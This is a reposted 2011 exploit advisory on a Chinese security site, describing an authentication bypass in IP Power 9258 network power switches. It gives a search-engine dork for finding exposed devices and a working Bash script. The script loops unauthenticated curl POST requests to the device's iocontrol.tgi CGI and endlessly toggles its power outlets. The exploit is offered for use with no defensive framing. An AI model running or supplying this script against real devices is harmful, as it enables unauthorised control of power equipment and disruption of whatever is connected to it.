首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IP Power 9258+ Authentication Bypass
来源:unallocatedspace 作者:unallocatedspace 发布时间:2011-06-07  
 |   |             | |                  |            |
|   | __ \   _` | | |  _ \   __|  _` | __|  _ \  _` |
|   | |   | (   | | | (   | (    (   | |    __/ (   |
\___/ _|  _|\__,_|_|_|\___/ \___|\__,_|\__|\___|\__,_|

  ___|
\___ \  __ \   _` |  __|  _ \
      | |   | (   | (     __/
_____/  .__/ \__,_|\___|\___|
       _|
|Teach, Learn, Party|Teach, Learn, Party|Teach, Learn, Party|

irc.efnet.net #unallocatedspace



--=+Multiple Remote Exploits in IP Power 9258+=-- by Crypt0s

IP Power is a Taiwanese company specializing in remote access devices that
let you turn on/off power ports via and ethernet connection.
They certainly are remote access!
Their IP Power 9258 line of devices run a firmware that is supposedly
"secure" but in fact just doesnt let you see the HTML output of the scripts
on the device without the appropriate login cookie.
Fortunantly, the /tgi/ (synonymous with CGI) scripts folder is full of the
CGI scripts that you need to operate the device, and they still accept post
requests.

GoogleDork: IP9258 Login Please enter
Look on all major search engines, they all have one or two.

This is made in Bash, mostly because this isn't worth scripting in Perl or
Metasploit:

#!/bin/bash

args=("$@")
while [ 1==1 ]
do
curl --data
"P60=On&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=On&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=On&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
curl --data
"P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=On&P63_TS=0&P63_TC=Off&ButtonName=Apply"
http://${args[0]}/tgi/iocontrol.tgi
done



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Tivoli Endpoint 4.1.1 Remo
·(Firefox & Safari & IE / RealP
·The KMPlayer 3.0.0.1440 .mp3 B
·CoolPlayer Portable 2.19.2 (.m
·1ClickUnzip 3.00 .ZIP File Hea
·Kleophatra v0.1.5 'TinyBrowser
·OpenDrive <= 1.3.141 Local Pas
·GoldenFTP PASS Stack Buffer Ov
·Xitami Web Server 2.5b4 Remote
·Xitami Web Server 2.5b4 Remote
·discuz! X1.5 Get Shell 叉day[A
·9959网店系统 v5.0 Blind SQL in
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved